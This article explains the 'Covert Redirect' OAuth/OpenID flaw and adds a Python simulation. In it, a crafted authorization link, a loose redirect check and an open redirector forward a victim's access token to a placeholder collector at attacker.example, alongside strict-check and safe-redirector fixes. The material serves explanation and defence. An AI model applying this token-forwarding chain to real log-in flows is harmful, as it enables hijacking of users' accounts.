Though Facebook wasn’t compromised by the Heartbleed bug several weeks ago, another flaw disclosed this week could affect the site. According to CNET, a Ph.D. student in Singapore found a weakness in the way many sites implement the OAuth and OpenID log-in standards, which are used by Facebook, Google, LinkedIn and many other large websites.
The flaw, called “Covert Redirect,” works by sending a user a crafted link that opens a genuine log-in popup for a website and asks the user to authorize an app. The popup is hard to distrust because it is served from the site’s real domain rather than a look-alike, which is the usual telltale sign of phishing. Once the user signs in and approves, the site hands the app’s access token or authorization code to an address on the app’s own domain that then forwards it to a destination the attacker chose. With that token the attacker can act on the user’s account and can send the user on to a malicious site.
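To make the mechanism concrete, here is an added Python example; it is not code from the article, from CNET or from the researcher, and the host names provider.example, app.example and attacker.example, the client id and the token value are all made up. It simulates the chain: a crafted authorization link, a provider that validates redirect_uri either loosely (any path on a registered host) or strictly (the full registered URI), and an app endpoint that forwards to whatever its `next` parameter names. The browser carries the URL fragment, where the implicit-flow access token travels, across the app’s redirect, which is how the token reaches the attacker.

```python
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed sample data: hypothetical provider, client and attacker hosts.
AUTHORIZE_ENDPOINT = "https://provider.example/oauth/authorize"
REGISTERED_REDIRECT_URIS = {"client-123": {"https://app.example/oauth/callback"}}
ATTACKER_COLLECTOR = "https://attacker.example/collect"


def build_authorize_url(client_id, redirect_uri, response_type="token"):
    """The link the attacker sends: a real authorization request to the real
    provider, but with redirect_uri pointing at the app's open redirector."""
    params = {"client_id": client_id, "redirect_uri": redirect_uri,
              "response_type": response_type, "scope": "email"}
    return AUTHORIZE_ENDPOINT + "?" + urlencode(params)


def weak_redirect_check(client_id, requested):
    """Flawed validation: any path on a registered host is accepted."""
    hosts = {urlparse(u).netloc for u in REGISTERED_REDIRECT_URIS[client_id]}
    return urlparse(requested).netloc in hosts


def strict_redirect_check(client_id, requested):
    """Exact match against the fully registered redirect URI (RFC 6749
    section 3.1.2.2 recommends registering complete URIs)."""
    return requested in REGISTERED_REDIRECT_URIS[client_id]


def provider_authorize(url, check):
    """Provider after the user consents in the genuine popup: validate
    redirect_uri with the given check, then deliver the token in the
    fragment (implicit flow), or refuse with None."""
    q = parse_qs(urlparse(url).query)
    client_id, redirect_uri = q["client_id"][0], q["redirect_uri"][0]
    if not check(client_id, redirect_uri):
        return None
    return redirect_uri + "#access_token=tok_secret&token_type=bearer"


def app_open_redirector(url):
    """Vulnerable app endpoint: 302 to whatever `next` names. The server
    never sees the fragment, but browsers re-attach it to the Location
    target when that target has no fragment of its own."""
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    if parsed.path != "/redirect" or "next" not in q:
        return None
    location = q["next"][0]
    if parsed.fragment and "#" not in location:
        location += "#" + parsed.fragment
    return location


def app_safe_redirector(url):
    """Hardened endpoint: follow `next` only when it is a relative path on
    this site; anything with a scheme or host falls back to the home page.
    The fragment is deliberately dropped."""
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    if parsed.path != "/redirect" or "next" not in q:
        return None
    nxt = q["next"][0]
    target = urlparse(nxt)
    if target.scheme or target.netloc or not nxt.startswith("/") or nxt.startswith("//"):
        return "https://app.example/"
    return "https://app.example" + nxt


def run_attack(check, redirector=app_open_redirector):
    """Full chain: crafted link -> provider -> app redirector -> URL the
    browser finally lands on. None means the provider refused the request."""
    crafted = "https://app.example/redirect?" + urlencode({"next": ATTACKER_COLLECTOR})
    auth_url = build_authorize_url("client-123", crafted)
    after_consent = provider_authorize(auth_url, check)
    return None if after_consent is None else redirector(after_consent)


if __name__ == "__main__":
    print("weak check, open redirector  :", run_attack(weak_redirect_check))
    print("strict check, open redirector:", run_attack(strict_redirect_check))
    print("weak check, safe redirector  :", run_attack(weak_redirect_check, app_safe_redirector))
```

Either side of the flow can close the hole on its own: with the strict check the provider never sends the token to the open redirector, and with the safe redirector the app never forwards it off-site. The reason the flaw is hard to eradicate is that the weak host-only check is convenient for providers with thousands of registered apps, and open redirectors are a common bug in the apps themselves.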
The Ph.D. student who discovered the loophole says that he contacted Facebook about the problem, and that Facebook responded that the issue was too big to solve “in the short term” because of the number of apps on the site that would have to comply with new rules.
However, though flaws like this are hard for the sites to stamp out quickly, users can reduce their own exposure. If clicking a link immediately opens a prompt to log in to, or authorize an app with, your Facebook account, close the tab instead of signing in. The attacker only gets a token if you complete that log-in. The durable fix sits with the sites themselves: the identity provider must accept only redirect addresses that were registered in full, and the apps that plug into it must not expose endpoints that forward visitors to arbitrary destinations.